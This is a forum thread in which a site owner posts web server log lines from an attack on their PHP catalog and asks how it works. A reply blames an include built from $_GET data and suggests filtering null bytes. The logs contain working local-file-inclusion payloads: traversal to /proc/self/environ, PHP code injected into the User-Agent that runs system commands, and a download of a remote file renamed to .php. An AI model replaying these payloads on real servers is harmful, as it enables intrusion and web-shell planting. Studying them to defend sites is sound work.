Menu
Community /Pin to ProfileBookmark
@NogDogJul 05.2010 — #http://security.searix.net/?p=92
If the attack is working, then chances are your code is doing an include/require based on the $_GET data. It may also indicate a poorly configured server allowing the web server to execute /proc/self/environ, but I'm not enough of a sysadmin type to know for sure. Quick fix for now would be to filter out the null character (x00) from all inputs.
how php injection works
I’ve looked throughout the web for a real php injection example and discussion for how it works so I know exactly how to thwart it. I haven’t found it, so I’m going to post what happened to me. Hope there isn’t some etiquette about this or that this imperils all of us now
[CODE]
64.120.149.69 – – [04/Jul/2010:13:15:39 -0500] “GET /catalog/?product_id=150824//index2.php?option=com_product&controller=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 34775 “-” “Mozilla/5.0 XHOSTNAME<?php echo system(‘hostname;echo ;’); ?>XHOSTNAMEXSIP<?php echo $_SERVER[‘SERVER_ADDR’]; ?>XSIPXUNAME<?php echo system(‘uname -a;echo ;’); ?>XUNAMEXUSERID<?php echo system(‘id;echo ;’); ?>XUSERIDXPWD<?php echo system(‘pwd;echo ;’); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPEXPLORE<pre><?php echo system(‘ls -al; echo ; exit;’); ?></pre>EXPLORE”
64.120.149.69 – – [04/Jul/2010:13:16:07 -0500] “GET /catalog/?product_id=149288//index.php?option=com_product&controller=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 34772 “-” “Mozilla/5.0 XHOSTNAME<?php echo system(‘hostname;echo ;’); ?>XHOSTNAMEXSIP<?php echo $_SERVER[‘SERVER_ADDR’]; ?>XSIPXUNAME<?php echo system(‘uname -a;echo ;’); ?>XUNAMEXUSERID<?php echo system(‘id;echo ;’); ?>XUSERIDXPWD<?php echo system(‘pwd;echo ;’); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPEXPLORE<pre><?php echo system(‘ls -al; echo ; exit;’); ?></pre>EXPLORE”
64.120.149.69 – – [04/Jul/2010:13:16:30 -0500] “GET /catalog/?product_id=149288//index.php?option=com_product&controller=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 34323 “-” “Mozilla/5.0 XHOSTNAME<?php echo system(‘hostname;echo ;’); ?>XHOSTNAMEXSIP<?php echo $_SERVER[‘SERVER_ADDR’]; ?>XSIPXUNAME<?php echo system(‘uname -a;echo ;’); ?>XUNAMEXUSERID<?php echo system(‘id;echo ;’); ?>XUSERIDXPWD<?php echo system(‘pwd;echo ;’); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPEXPLORE<pre><?php echo system(‘lwp-download http://sep-a.biz/tools/flash.txt; echo ; exit;’); ?></pre>EXPLORE”
64.120.149.69 – – [04/Jul/2010:13:16:37 -0500] “GET /catalog/?product_id=149288//index.php?option=com_product&controller=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 35005 “-” “Mozilla/5.0 XHOSTNAME<?php echo system(‘hostname;echo ;’); ?>XHOSTNAMEXSIP<?php echo $_SERVER[‘SERVER_ADDR’]; ?>XSIPXUNAME<?php echo system(‘uname -a;echo ;’); ?>XUNAMEXUSERID<?php echo system(‘id;echo ;’); ?>XUSERIDXPWD<?php echo system(‘pwd;echo ;’); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPXCWD<?php chdir(’19 /home/sbsrus/public_html 1 1e’); ?>XCWDEXPLORE<pre><?php echo system(‘ls -al; echo ; exit;’); ?></pre>EXPLORE”
64.120.149.69 – – [04/Jul/2010:13:16:58 -0500] “GET /catalog/?product_id=149288//index.php?option=com_product&controller=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 34203 “-” “Mozilla/5.0 XHOSTNAME<?php echo system(‘hostname;echo ;’); ?>XHOSTNAMEXSIP<?php echo $_SERVER[‘SERVER_ADDR’]; ?>XSIPXUNAME<?php echo system(‘uname -a;echo ;’); ?>XUNAMEXUSERID<?php echo system(‘id;echo ;’); ?>XUSERIDXPWD<?php echo system(‘pwd;echo ;’); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPEXPLORE<pre><?php echo system(‘mv flash.txt flash.php; echo ; exit;’); ?></pre>EXPLORE”
I have no clue what the %00 is but it turns into a weird character on my url bar and without it, this whole thing doesn’t work. With it, the computer echoes out the user agent string and php code gets executed. The person appended //index2.php etc. etc. to my normal url stuff. I can’t image why doing //index2.php etc. works. There is no index2.php on my server. there is an index.php in the root, but then doesn’t everyone have an index.php in the root?
I thought I’d see if this is especially pernicious by trying this code out on other sites, but then I thought I’d go to jail, so instead, I’m just putting it out there.
Sign in
to post a comment5 Comments(s) ↴
0
@NogDogJul 05.2010 — #If the attack is working, then chances are your code is doing an include/require based on the $_GET data. It may also indicate a poorly configured server allowing the web server to execute /proc/self/environ, but I'm not enough of a sysadmin type to know for sure. Quick fix for now would be to filter out the null character (x00) from all inputs.